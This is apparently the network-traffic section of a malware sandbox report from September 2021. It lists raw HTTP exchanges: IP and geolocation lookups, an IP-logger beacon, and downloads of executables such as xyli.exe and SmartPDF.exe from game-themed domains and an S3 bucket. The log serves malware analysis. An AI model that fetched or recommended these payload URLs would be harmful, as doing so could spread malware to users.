Network Analysis

GET /country HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ipinfo.io

GET /api/json/ip/gp65l99h87k3l1g0owh8fr8v99dme/175.208.134.150 HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ipqualityscore.com

HTTP/1.1 403 Forbidden Date: Sun, 12 Sep 2021 05:47:55 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: keep-alive X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vgP4iLURZk%2Fa7Me1RC17ZO10xWu%2Bmd32W%2Fyoj1Bt7X5uTSjUy1%2FbDrRoR2ADTZX1oLP9XvF3ZGLohpGspSJ8fWvBCeKdp6Ve9ToeAmdIJlPWBfoIVz53qzteuV5VJQw%2BP9OLLQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 68d6d8099891fbe0-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /1E2Xu7 HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 2no.co

HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Sep 2021 05:48:24 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=vri5p94c7dsl2a246bhapurmo3; path=/; HttpOnly Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=247622487; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Answers: whoami: e22aea98ae54fa2f3e40168baf52d99703c3b0c2c3514dfc630511e543d438b2 Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 12 Sep 2021 05:48:42 GMT Content-Type: application/json; charset=utf-8 Content-Length: 348 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: no-cache Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jtq6PzVCCGgXcszXvB1p2mAfFRpQqUO9bhIuOSQ%2BDxdRkfJztt6y5S3%2BDEo%2F5XuafWRULwOquKnQezygoSyFZK12Q1HGiN%2B4vyz4NrmRNXWchcLNP24j%2F95M2Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 68d6d9213a5f0aca-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /userf/2203/gdgame.exe HTTP/1.1 Host: jom.diregame.live Connection: Keep-Alive

HTTP/1.1 302 Found Date: Sun, 12 Sep 2021 05:49:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive location: https://d.dirdgame.live/userf/2203/6c5332b113e6f9bd83980c8858001543.exe CF-Cache-Status: BYPASS Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WcJ0tAAmSp36A1EbO3B7lTdGfOCABLJ4%2FSjuHIaO54tjbNav5H%2FTVIi4a%2Fyd0xHVp5S8jNPVloDae%2FFfin5uoX36bre80S2WBC09b26pf94y3s5UJkGHxlq9NRuhfWT5ph%2Fm6w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 68d6da9648b00a46-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /userf/2203/6c5332b113e6f9bd83980c8858001543.exe HTTP/1.1 Host: d.dirdgame.live Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 12 Sep 2021 05:49:41 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive content-disposition: attachment; filename="xyli.exe" content-transfer-encoding: binary vary: Accept-Encoding Cache-Control: max-age=14400 CF-Cache-Status: MISS Last-Modified: Sun, 12 Sep 2021 05:49:40 GMT Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ojWHl5YMCKu9Mv56RLZUqD1%2BPuaFAWMn7AUz6%2FvV8SA7j0ok%2FZ%2BT5B3uq7ar2o%2BYlyp6EhMi3VakRWfsDFw96xsFC%2FOTVLFrCCQs5sDgMtczF2KW4wIeN06DXlNNolxejU4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 68d6da99c9960aba-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /country HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ipinfo.io

HTTP/1.1 302 Found access-control-allow-origin: * location: https://ipinfo.io/country vary: Accept, Accept-Encoding content-type: text/plain; charset=utf-8 content-length: 47 date: Sun, 12 Sep 2021 05:47:52 GMT x-envoy-upstream-service-time: 1 Via: 1.1 google

GET /ip HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ipinfo.io

HTTP/1.1 200 OK access-control-allow-origin: * content-type: text/html; charset=utf-8 content-length: 15 date: Sun, 12 Sep 2021 05:47:54 GMT x-envoy-upstream-service-time: 1 Via: 1.1 google

HEAD /SmartPDF.exe HTTP/1.0 Host: c115ccef-fcb1-4039-a9a5-8e09a6993f8d.s3.eu-west-2.amazonaws.com User-Agent: InnoTools_Downloader

HTTP/1.1 200 OK x-amz-id-2: aX81Z5V+N2B69Vk7G5EX822UUPC9wk4MwAkKnwu9JNOIoNGkRNjd5igmncRAa4LN5udHuHgS4IE= x-amz-request-id: J2ZFJPPJWKTQ34CD Date: Sun, 12 Sep 2021 05:47:57 GMT Last-Modified: Fri, 10 Sep 2021 14:14:45 GMT ETag: "83c0c50163fbfb9dc597786170379573-5" Accept-Ranges: bytes Content-Type: application/x-msdownload Server: AmazonS3 Content-Length: 22619648 Connection: close

GET /SmartPDF.exe HTTP/1.0 Host: c115ccef-fcb1-4039-a9a5-8e09a6993f8d.s3.eu-west-2.amazonaws.com User-Agent: InnoTools_Downloader

HTTP/1.1 200 OK x-amz-id-2: +S3v9suSXnELHp132gsqVO0S95cawFyJK73f3Ax5mk20GVwn+Ls/yQ+xI8Eiw63cYl+Hn1gjv1g= x-amz-request-id: H89X8XG0K2F3YETM Date: Sun, 12 Sep 2021 05:47:58 GMT Last-Modified: Fri, 10 Sep 2021 14:14:45 GMT ETag: "83c0c50163fbfb9dc597786170379573-5" Accept-Ranges: bytes Content-Type: application/x-msdownload Server: AmazonS3 Content-Length: 22619648 Connection: close

GET /ip HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ipinfo.io

HTTP/1.1 200 OK access-control-allow-origin: * content-type: text/html; charset=utf-8 content-length: 15 date: Sun, 12 Sep 2021 05:48:21 GMT x-envoy-upstream-service-time: 1 Via: 1.1 google